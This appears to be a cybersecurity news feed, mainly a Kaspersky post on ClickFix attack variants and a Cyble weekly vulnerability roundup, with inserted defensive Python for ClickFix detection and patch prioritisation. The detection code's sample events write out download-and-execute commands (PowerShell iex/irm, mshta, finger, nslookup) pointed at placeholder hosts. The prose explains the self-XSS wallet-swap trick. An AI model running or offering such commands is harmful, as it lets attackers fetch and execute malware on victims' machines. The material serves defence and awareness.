Google Disrupts Chinese Cyberespionage Campaign Targeting Telecoms, Governments

The UNC2814 threat actor has been active since at least 2017, targeting organizations across 42 countries. 

The post Google Disrupts Chinese Cyberespionage Campaign Targeting Telecoms, Governments appeared first on SecurityWeek.

Source: SecurityWeek

Variations of the ClickFix | Kaspersky official blog

About a year ago, we published a post about the ClickFix technique, which was gaining popularity among attackers. The essence of a ClickFix attack is to convince the victim, under some pretext, to run a malicious command on their own computer. From a security solution's point of view, that command is therefore executed by the active user, with that user's privileges.

In early uses of this technique, attackers tried to convince victims that they needed to run a command to fix some problem or to pass a CAPTCHA, and in the vast majority of cases the malicious command was a PowerShell one-liner. Since then, attackers have come up with new pretexts that users should be warned about, as well as new methods of delivering the malicious payload that defenders should keep an eye on.

Use of mshta.exe

Last year, Microsoft researchers published a report on attacks targeting hoteliers who work with Booking.com. The attackers sent fake notifications from the service, or emails purporting to come from guests and drawing attention to a review. In both cases the email contained a link to a site imitating Booking.com, which asked the victim to prove they were not a robot by running a command via the Run dialog.

There are two key differences between this attack and the original ClickFix scenario. First, the user isn't asked to copy the string themselves (a visible string of code sometimes arouses suspicion): the malicious site places it on the clipboard, probably when the user clicks the checkbox that mimics the reCAPTCHA widget. Second, the string invokes the legitimate mshta.exe utility, which runs HTML Applications (HTA files). It fetches the HTA from the attackers' server and executes the malicious payload.

Video on TikTok and PowerShell with administrator privileges

BleepingComputer published an article in October 2025 about a campaign spreading malware through instructions in TikTok videos. The videos imitate tutorials on activating proprietary software for free. The advice boils down to running PowerShell with administrator rights and then executing the command iex (irm {address}). Here irm (Invoke-RestMethod) downloads a script from an attacker-controlled server, and iex (Invoke-Expression) runs it directly in memory. The script in turn downloads an infostealer to the victim's computer; because the user has already elevated the PowerShell session, everything launched from it inherits administrator rights.

Using the Finger protocol

Another unusual ClickFix variant uses the familiar CAPTCHA lure, but the malicious command relies on the antiquated Finger protocol. The utility of the same name lets anyone request information about a specific user on a remote server. The protocol is rarely used today, but a client for it still ships with Windows (finger.exe), macOS, and a number of Linux distributions.

The user is persuaded to open a command prompt and run a command that connects to the attackers' server over the Finger protocol (TCP port 79). The protocol carries nothing but text, but that is enough to deliver another script to the victim's computer, which then installs the malware.
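To make the point concrete, here is a Finger exchange (RFC 1288) reduced to localhost. This is an added example, not code from the Kaspersky post or from any real campaign: a throwaway server that answers any query with a constructed text "user record", and a client that does what `finger user@host` does on the wire. The record content is made up and nothing is executed; the lesson is that the server can return any text it likes.

```python
"""A Finger exchange (RFC 1288) on localhost.

Added example, not code from the Kaspersky post.  The server's "user
record" below is constructed; a hostile server would return a script there.
"""
import socket
import threading


def record_for(user: str) -> str:
    # Constructed response text.  Finger imposes no structure on it at all.
    return (f"Login: {user}\r\n"
            "Plan:\r\n"
            "echo this line came back over TCP/79 as plain text\r\n")


def serve_one_query(listener: socket.socket) -> None:
    """Accept one connection, read a CRLF-terminated query, answer, close."""
    conn, _ = listener.accept()
    with conn:
        buf = b""
        while not buf.endswith(b"\r\n"):
            chunk = conn.recv(1024)
            if not chunk:
                break
            buf += chunk
        user = buf.decode("ascii", "replace").rstrip("\r\n") or "nobody"
        conn.sendall(record_for(user).encode("ascii"))
    # Closing the connection is the end-of-response marker in Finger.


def finger_query(host: str, port: int, user: str) -> str:
    """What `finger user@host` does: send "user\\r\\n", read until EOF."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(f"{user}\r\n".encode("ascii"))
        chunks = []
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks).decode("ascii", "replace")


def run_local_exchange(user: str = "demo") -> str:
    """Start the demo server on an ephemeral port, run one query, return the reply."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]
    t = threading.Thread(target=serve_one_query, args=(listener,), daemon=True)
    t.start()
    try:
        reply = finger_query("127.0.0.1", port, user)
    finally:
        t.join(timeout=5)
        listener.close()
    return reply


if __name__ == "__main__":
    print(run_local_exchange())
```

The whole protocol is one line from the client and free-form text from the server until the connection closes, which is why a command such as `finger user@host` piped into an interpreter is enough to turn a user-information lookup into a download channel.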

CrashFix variant

Another ClickFix variant stands out for its more sophisticated social engineering. It was used against users looking for a tool to block advertising banners, trackers, malware, and other unwanted content on web pages. When searching for a suitable Google Chrome extension, victims found one called NexShield – Advanced Web Guardian. It was in fact a clone of real, working software, but at some point it crashed the browser and displayed a fake notification about a detected security problem, along with a prompt to run a "scan" to fix the error. If the user agreed, they received instructions on how to open the Run dialog and execute a command that the extension had already placed on the clipboard.

The command copied the familiar finger.exe to a temporary directory, renamed it ct.exe, and launched it with the attackers' address as the argument. The rest of the attack matched the case above: in response to the Finger request, a malicious script was delivered, which launched and installed a remote access Trojan (in this case ModeloRAT). The copy-and-rename step is presumably meant to defeat rules that key on the process name finger.exe; detection based on the binary's original file name or hash is unaffected by it.

Malware delivery via DNS lookup

The Microsoft Threat Intelligence team also shared a ClickFix variant that is slightly more complex than usual. Unfortunately, they did not describe the social-engineering lure, but the payload-delivery method is interesting. Probably to complicate detection in a corporate environment and extend the life of the malicious infrastructure, the attackers added an extra step: a query to a DNS server under their control.

That is, once the victim has been persuaded to copy and execute the malicious command, it uses the legitimate nslookup utility, running as the user, to request records for the example.com domain. The command names a specific DNS server, controlled by the attackers, as the resolver to query. Because the attackers operate that resolver, the queried domain is irrelevant: the answer they return carries, among other things, a string containing a malicious script, which in turn downloads the final payload (again ModeloRAT).

Cryptocurrency bait and JavaScript as payload

The next variant is interesting for its multi-stage social engineering. In Pastebin comments, attackers actively spread a message about a supposed flaw in the Swapzone.io cryptocurrency exchange service. Cryptocurrency owners were invited to visit a site created by the fraudsters, which contained full instructions on exploiting this "flaw", supposedly good for up to $13,000 in a couple of days.

The instructions explain how the service's "flaw" can be exploited to exchange cryptocurrency at a better rate. To do so, the victim has to open the service's website in Chrome, type "javascript:" into the address bar by hand (browsers strip that prefix from pasted text precisely to hinder this kind of self-XSS, which is why the instructions insist on typing it), then paste the JavaScript copied from the attackers' site and run it. In reality, of course, the script cannot affect exchange rates in any way; it simply replaces the Bitcoin wallet addresses shown on the page, and if the victim does try to exchange something, the funds go to the attackers' accounts.

How to protect your company from ClickFix attacks

The simplest ClickFix attacks can be countered by blocking the [Win] + [R] key combination on work devices (the Explorer policy "Remove Run menu from Start Menu", which sets the NoRun value, also disables that shortcut). But, as the examples above show, the Run dialog is far from the only place users are asked to run malicious code themselves: a command prompt, an elevated PowerShell window, and even the browser's address bar serve just as well.
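What the variants above have in common is a legitimate Windows binary launched from an interactive parent (the Run dialog is explorer.exe, otherwise cmd or PowerShell) with a command line that reaches out to a remote host. That is visible in process-creation telemetry regardless of which key combination was used. The following is an added example, not code from the Kaspersky post or from any vendor: a small rule set covering the mshta.exe, iex (irm ...), Finger/CrashFix and nslookup variants, run over constructed Sysmon Event ID 1-style records. Hosts, paths and addresses in the sample events are placeholders from the RFC 2606/5737 reserved ranges, not real indicators.

```python
"""Hunt for ClickFix-style launches in process-creation telemetry.

Added example, not code from the Kaspersky post.  SAMPLE_EVENTS are
constructed in the shape of Sysmon Event ID 1 / EDR process-creation
records; hosts and addresses are placeholders, not real IOCs.
"""
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, object]

# Parents that indicate a person typed or pasted the command: the Run dialog
# (explorer.exe) or an interactive cmd / PowerShell window.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe"}

_HTTP = re.compile(r"https?://", re.I)
_PS_EVAL = re.compile(r"\b(iex|invoke-expression)\b", re.I)
_PS_FETCH = re.compile(r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b", re.I)
_FINGER_REMOTE = re.compile(r"\S+@\S+")   # user@host form = query to a remote Finger server


def _binary(e: Event) -> str:
    """Prefer the PE OriginalFileName, so a copy of finger.exe renamed to
    ct.exe (the CrashFix trick) still matches as finger.exe."""
    return str(e.get("original_file_name") or e["image"]).lower()


def rule_mshta_remote(e: Event) -> bool:
    """mshta.exe pointed at a URL (the Booking.com lure)."""
    return _binary(e) == "mshta.exe" and bool(_HTTP.search(str(e["cmdline"])))


def rule_powershell_fetch_and_eval(e: Event) -> bool:
    """Download-and-evaluate in one line, e.g. iex (irm <url>) (the TikTok lure)."""
    cmd = str(e["cmdline"])
    return _binary(e) in {"powershell.exe", "pwsh.exe"} and bool(
        _PS_EVAL.search(cmd) and _PS_FETCH.search(cmd))


def rule_finger_remote(e: Event) -> bool:
    """finger.exe querying a remote host over TCP/79 (Finger and CrashFix variants)."""
    return _binary(e) == "finger.exe" and bool(_FINGER_REMOTE.search(str(e["cmdline"])))


def rule_nslookup_custom_resolver(e: Event) -> bool:
    """nslookup with an explicit resolver as the second positional argument,
    i.e. the attacker-controlled DNS server named in the command."""
    if _binary(e) != "nslookup.exe":
        return False
    positional = [a for a in str(e["cmdline"]).split()[1:] if not a.startswith("-")]
    return len(positional) >= 2


RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    ("mshta_remote_hta", rule_mshta_remote),
    ("powershell_fetch_and_eval", rule_powershell_fetch_and_eval),
    ("finger_remote_fetch", rule_finger_remote),
    ("nslookup_custom_resolver", rule_nslookup_custom_resolver),
]


def classify(e: Event) -> List[str]:
    """Names of the rules an event matches; only human-launched children count."""
    if str(e["parent"]).lower() not in INTERACTIVE_PARENTS:
        return []
    return [name for name, rule in RULES if rule(e)]


def scan(events: List[Event]) -> List[Tuple[int, List[str]]]:
    """(index, matched rule names) for every event that trips at least one rule."""
    hits = []
    for i, e in enumerate(events):
        names = classify(e)
        if names:
            hits.append((i, names))
    return hits


# Constructed sample telemetry: one record per variant, plus two benign controls.
SAMPLE_EVENTS: List[Event] = [
    {"parent": "explorer.exe", "image": "mshta.exe", "original_file_name": "mshta.exe",
     "cmdline": "mshta https://captcha.example.com/verify.hta"},
    {"parent": "explorer.exe", "image": "powershell.exe", "original_file_name": "PowerShell.EXE",
     "cmdline": 'powershell -w hidden -c "iex (irm https://activate.example.net/setup.ps1)"'},
    {"parent": "cmd.exe", "image": "finger.exe", "original_file_name": "finger.exe",
     "cmdline": "finger support@finger.example.org"},
    {"parent": "cmd.exe", "image": "ct.exe", "original_file_name": "finger.exe",   # renamed copy
     "cmdline": r"C:\Users\user\AppData\Local\Temp\ct.exe admin@203.0.113.10"},
    {"parent": "cmd.exe", "image": "nslookup.exe", "original_file_name": "nslookup.exe",
     "cmdline": "nslookup -type=txt example.com 203.0.113.53"},
    {"parent": "cmd.exe", "image": "nslookup.exe", "original_file_name": "nslookup.exe",
     "cmdline": "nslookup example.com"},                 # ordinary lookup, default resolver
    {"parent": "explorer.exe", "image": "powershell.exe", "original_file_name": "PowerShell.EXE",
     "cmdline": "powershell -c Get-Process"},             # no download-and-eval
]

if __name__ == "__main__":
    for idx, names in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {SAMPLE_EVENTS[idx]['cmdline']!r} -> {', '.join(names)}")
```

The parent-process gate is what keeps this usable: the same binaries run constantly from scheduled tasks and management agents, but a person pasting into Run or a console is the signature of ClickFix. Treat the rules as hunting queries, not blocking rules; an administrator running nslookup against a specific resolver will match the last one, and the clipboard-staging variants can be caught earlier by alerting on clipboard writes from the browser that contain these binary names.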

Therefore, the main advice is to raise employee cybersecurity awareness. Employees must clearly understand that if someone asks them to perform unusual manipulations on their system, and/or to copy and paste code somewhere, in most cases it is a trick used by cybercriminals. Security awareness training can be organized using the Kaspersky Automated Security Awareness Platform.

In addition, to protect against such cyberattacks, we recommend:

Source: Kaspersky official blog

One Identity Appoints Michael Henricks as Chief Financial and Operating Officer

Alisa Viejo, CA, United States, 25th February 2026, CyberNewswire

Source: Hackread – Cybersecurity News, Data Breaches, AI and More

The Week in Vulnerabilities: WordPress, BeyondTrust, and Critical ICS Bugs


Cyble Research & Intelligence Labs (CRIL) tracked 1,102 vulnerabilities last week. Of these, 166 vulnerabilities already have publicly available Proof-of-Concept (PoC) exploits, significantly increasing the likelihood of real-world attacks. A total of 49 vulnerabilities were rated critical under CVSS v3.1, while 32 received critical severity under CVSS v4.0.

Additionally, CISA added 9 vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, citing confirmed active exploitation. 

On the industrial front, CISA issued 8 ICS advisories covering 18 vulnerabilities impacting Siemens, Honeywell, Delta Electronics, GE Vernova, PUSR, EnOcean, Valmet, and Welker products. 

Cyble Weekly Vulnerability Report: New Flaws and CVEs

CVE-2026-1357 — WPvivid Backup & Migration Plugin (Critical) 

CVE-2026-1357 is a critical unauthenticated arbitrary file upload and remote code execution vulnerability affecting the WPvivid Backup & Migration plugin for WordPress. The flaw stems from improper handling of RSA decryption errors combined with unsanitized filename inputs, allowing attackers to upload malicious PHP web shells to publicly accessible directories.

A public PoC is available, and the vulnerability surfaced in underground discussions shortly after disclosure, significantly lowering the barrier to exploitation. 

CVE-2026-1731 — BeyondTrust Remote Support & PRA (Critical) 

CVE-2026-1731 is a critical OS command injection vulnerability in BeyondTrust Remote Support (RS) and Privileged Remote Access (PRA). The flaw exists within a WebSocket-based endpoint, allowing unauthenticated attackers to execute arbitrary commands on internet-facing instances. 

Successful exploitation enables full system compromise, data exfiltration, lateral movement, and persistent access. A PoC is publicly available. 

CVE-2025-49132 — Pterodactyl Panel (Critical) 

CVE-2025-49132 affects the Pterodactyl Panel game-server management platform and allows unauthenticated remote code execution through improper validation of user-controlled parameters. 

Threat actors were observed sharing weaponized exploits on underground forums, highlighting the vulnerability’s operational risk. 

CVE-2026-25639 — Axios HTTP Client (High Severity) 

CVE-2026-25639 is a denial-of-service vulnerability in the Axios HTTP client, where crafted JSON payloads exploiting improper configuration merging can crash Node.js or browser applications. 

The vulnerability was captured in underground forums shortly after disclosure and has a public PoC.  

CVE-2026-20841 — Windows Notepad (High Severity) 

CVE-2026-20841 is a command injection vulnerability in the Windows Notepad app, enabling execution of malicious payloads via specially crafted files. Exploitation could enable privilege escalation and malware deployment. 

Vulnerabilities Added to CISA KEV 

CISA added 9 vulnerabilities to the KEV catalog during the reporting period. 

Notable additions include: 

  • CVE-2026-2441 — Google Chrome use-after-free vulnerability enabling potential arbitrary code execution via crafted HTML.  

  • CVE-2025-15556 — Notepad++ update integrity verification vulnerability reportedly exploited by the China-linked threat actor Lotus Blossom. 

KEV additions serve as strong indicators of exploitation maturity and heightened ransomware or espionage risk. 

Critical ICS Vulnerabilities 

During the reporting period, CISA issued 8 ICS advisories covering 18 vulnerabilities. The majority were rated high severity. 

CVE-2026-1670 — Honeywell CCTV Products (Critical) 

CVE-2026-1670 affects Honeywell CCTV products and carries a CVSS score of 9.8. The vulnerability allows an unauthenticated attacker to remotely alter the password recovery email address, effectively hijacking administrator accounts. 

Successful exploitation enables: 

  • Full administrative account takeover 

  • Unauthorized access to live surveillance feeds 

  • Potential lateral movement into connected networks 

Because no credentials or user interaction are required, this vulnerability presents a high mass-exploitation risk. 

CVE-2026-25715 — PUSR USR-W610 Router (Critical) 

CVE-2026-25715 impacts the PUSR USR-W610 router and involves weak password requirements. If exploited, attackers can bypass authentication, compromise administrator credentials, or disrupt services. 

The risk is amplified by the vendor’s acknowledgment that the product has reached end-of-life and no patches are planned. Organizations are urged to isolate or replace affected devices immediately. 

Siemens Simcenter Vulnerabilities (High Severity Cluster) 

Multiple high-severity out-of-bounds read/write and buffer overflow vulnerabilities were disclosed in Siemens Simcenter Femap and Nastran products (CVE-2026-23715 through CVE-2026-23720). These flaws may enable memory corruption and potential code execution in industrial engineering environments. 

Impacted Critical Infrastructure Sectors 

Analysis of the 18 disclosed ICS vulnerabilities shows that Critical Manufacturing is the primary affected sector for 61.1% of them and appears among the affected sectors for 83.3%. This concentration highlights the continued exposure of manufacturing environments and their interdependencies with the Energy, Water, and Chemical sectors.

Conclusion 

The combination of high-volume IT vulnerabilities, publicly available PoCs, underground exploit discussions, and critical ICS exposures underscores the evolving threat landscape across enterprise and industrial environments. 

With 166 PoCs already available and 9 KEV additions confirming active exploitation, organizations must adopt a risk-based vulnerability management approach that prioritizes: 

  • Rapid patching of internet-facing assets 

  • Strict network segmentation between IT and OT environments 

  • Removal or isolation of end-of-life devices 

  • Deployment of multi-factor authentication 

  • Continuous monitoring for anomalous behavior 

  • Routine vulnerability assessments and penetration testing 
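Risk-based prioritization in practice means ordering findings by evidence of exploitation before raw severity, then attaching an action that accounts for whether a fix exists. The following is an added example, not Cyble's tooling: a small triage routine applied to the CVEs named in this report. Severity ratings, PoC/KEV status and the end-of-life flag are taken from the text above; the per-finding asset context (internet-facing, reachable without credentials) is an assumption made for illustration and is marked as such in the code.

```python
"""Rank the week's findings by exploitation evidence, then severity.

Added example, not Cyble's own tooling.  CVE facts (severity rating,
PoC / KEV status, end-of-life) come from the report above; asset context
(internet_facing) is ASSUMED per finding for illustration.
"""
from dataclasses import dataclass
from typing import List, Tuple

SEVERITY_RANK = {"critical": 4, "high": 3, "medium": 2, "low": 1}


@dataclass(frozen=True)
class Finding:
    cve: str
    product: str
    severity: str                   # qualitative rating as given in the report ("unrated" if none)
    in_kev: bool = False            # listed in CISA KEV: exploitation is confirmed
    public_poc: bool = False        # public PoC or weaponized exploit circulating
    unauthenticated: bool = False   # reachable without credentials
    internet_facing: bool = False   # ASSUMED asset context, not from the report
    end_of_life: bool = False       # vendor will not ship a fix


def priority_key(f: Finding) -> Tuple[bool, bool, bool, bool, int]:
    """Higher tuple sorts first.  Confirmed exploitation beats a PoC; an
    exposed asset with a PoC or no-auth path beats a PoC alone; the
    severity rating only breaks ties."""
    return (
        f.in_kev,
        f.public_poc and f.internet_facing,
        f.unauthenticated and f.internet_facing,
        f.public_poc,
        SEVERITY_RANK.get(f.severity.lower(), 0),
    )


def prioritize(findings: List[Finding]) -> List[Finding]:
    """Stable sort, so findings with identical evidence keep report order."""
    return sorted(findings, key=priority_key, reverse=True)


def recommended_action(f: Finding) -> str:
    if f.end_of_life:
        return "isolate or replace: end-of-life, no patch planned"
    if f.in_kev or (f.internet_facing and (f.public_poc or f.unauthenticated)):
        return "patch now; if no fix exists, take offline or restrict exposure"
    if f.internet_facing:
        return "patch in the next maintenance window"
    return "patch on the regular cycle"


# Constructed from the report's text; internet_facing values are assumptions.
FINDINGS: List[Finding] = [
    Finding("CVE-2026-1357", "WPvivid Backup & Migration (WordPress)", "critical",
            public_poc=True, unauthenticated=True, internet_facing=True),
    Finding("CVE-2026-1731", "BeyondTrust RS / PRA", "critical",
            public_poc=True, unauthenticated=True, internet_facing=True),
    Finding("CVE-2025-49132", "Pterodactyl Panel", "critical",
            public_poc=True, unauthenticated=True, internet_facing=True),
    Finding("CVE-2026-25639", "Axios HTTP client", "high", public_poc=True),
    Finding("CVE-2026-20841", "Windows Notepad", "high"),
    Finding("CVE-2026-2441", "Google Chrome", "unrated", in_kev=True),
    Finding("CVE-2025-15556", "Notepad++ updater", "unrated", in_kev=True),
    Finding("CVE-2026-1670", "Honeywell CCTV", "critical",
            unauthenticated=True, internet_facing=True),
    Finding("CVE-2026-25715", "PUSR USR-W610", "critical", end_of_life=True),
]

if __name__ == "__main__":
    for f in prioritize(FINDINGS):
        print(f"{f.cve:15} {f.product:40} {recommended_action(f)}")
```

Note what the ordering does with the report's own data: the two KEV entries come out on top even though the report gives them no severity rating, the three critical PoC-backed server-side bugs follow, and the end-of-life router gets an isolation action rather than a patch deadline that can never be met. Replace the assumed `internet_facing` flags with real asset inventory data before using anything like this for actual scheduling.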

Cyble’s attack surface management solutions enable organizations to continuously monitor exposures, prioritize remediation, and detect early warning signals of exploitation. Additionally, Cyble’s threat intelligence and third-party risk intelligence capabilities provide visibility into vulnerabilities actively discussed in underground communities, empowering proactive defense against both IT and ICS threats. 


Source: Cyble

Why ‘Call This Number’ TOAD Emails Beat Gateways

Attackers are bypassing email gateways through telephone-oriented attack delivery (TOAD), in which the only email payload is a phone number.

Source: darkreading

Is Alexa+ too cheerful for you? Now you can select among 3 personality styles – here’s how

I don’t need an ‘easy peasy lemon squeezy’ response when I ask Alexa to turn off a lamp – a simple ‘OK’ will do.

Source: Latest news

Over 12 Million Users Impacted by CarGurus Data Breach

Hackers claim to have stolen personally identifiable information and internal corporate data from the automotive firm.


Source: SecurityWeek

Ex-US Defense Contractor Executive Jailed for Selling Exploits to Russia

Peter Williams was sentenced to 87 months in prison for selling cyber exploits to a Russian broker.


Source: SecurityWeek

Autonomous Endpoint Management Isn’t Just Efficiency, It’s a Security Imperative

Autonomous Endpoint Management cuts exposure time by matching patch speed to attacker breakout timelines, reducing risk, workload delays, and breach costs.

Source: Hackread – Cybersecurity News, Data Breaches, AI and More

SecurityWeek Report: 426 Cybersecurity M&A Deals Announced in 2025

SecurityWeek’s M&A data indicates that today’s market is more disciplined, and it seems to favor GRC, data protection, and identity.


Source: SecurityWeek